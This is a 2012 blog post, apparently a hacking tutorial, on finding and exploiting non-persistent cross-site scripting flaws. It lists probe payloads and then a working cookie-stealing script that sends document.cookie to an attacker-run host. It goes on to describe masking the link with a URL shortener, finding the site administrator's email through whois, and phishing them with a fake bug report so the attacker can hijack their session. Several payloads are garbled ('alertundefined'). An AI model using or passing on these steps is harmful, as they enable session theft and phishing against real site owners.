Thursday, 14 June 2012

XSS Attack-PART 2

Posted By Maher Bro


Types of XSS

There are actually three types of Cross-Site Scripting, commonly named as:


- Persistent X

- Non-persistent XSS

- DOM-Based XSS

S0 in diz tutorial i will be concentrating on Non-Persistent method :D

Non-persistent XSS

The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It’s commonly named as “non-persistent” because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker’s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will return the result of these HTML entities.


Finding a XSS Vulnerable sites

    First of all,we need to find sites which are vulnerable to XSS attack.There are many such sites.
    To find XSS vulnerable sites add a code after the link.Add below given codes after the site link to find whether the site is vulnerable or not :

    Code:
    "><script>alertundefineddocument.cookie)</script>
    Code:
    '><script>alertundefineddocument.cookie)</script>
    Code:
    "><script>alertundefined"Test")</script>
    Code:
    '><script>alertundefined"Test")</script>
    Or a new one which i found out myself which you can inject HTML:
    Code:
    "><body bgcolor="FF0000"></body>
    Code:
   <body onload=alert('test1')>

    After adding these codes after the link if your site is http://www.example.com the link to test it would be: http://www.example.com/index.php?id="><script>alert(document.cookie)</script> and now press Enter.
    Then if we see a javascript is pop up Or you saw the page's background go black Or a page of google opens in that site,it means we have come to a XSS vulnerable site FOr example see d image below ~_~  
 





  • After finding the site check for its search box , it must be like this search.php and now you have to check whether this search.php is vulnerable or not.
  • To check this add this simple code in the search box and click the search button.
Code:
<script>alert(document.cookie)</script>
  • After searching this code if a box popup it means this search.php is vulnerable to Non-Persistent XSS attack.
  • Now after confirming the vulnerability add the below code in the url of this search.php page.
Code:
"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>
  • Now we have to shrink the link of whole page for this use tinyurl or any other such service.
  • Now try to find a site administrator's E-mail,for this you may use whois lookup table or any online service which gives you the detail of the site's owner
  • After getting the email id send him a fake email from any online fake mailer or through your fake id.
  • In the body of the email just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php in which you have also added the code.
  • Tinyurl will mask the link and don't let it to go to spam
  • Once he clicked on that link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. 
  • No matter what he does and changes his password you can still login as him.

0 comments: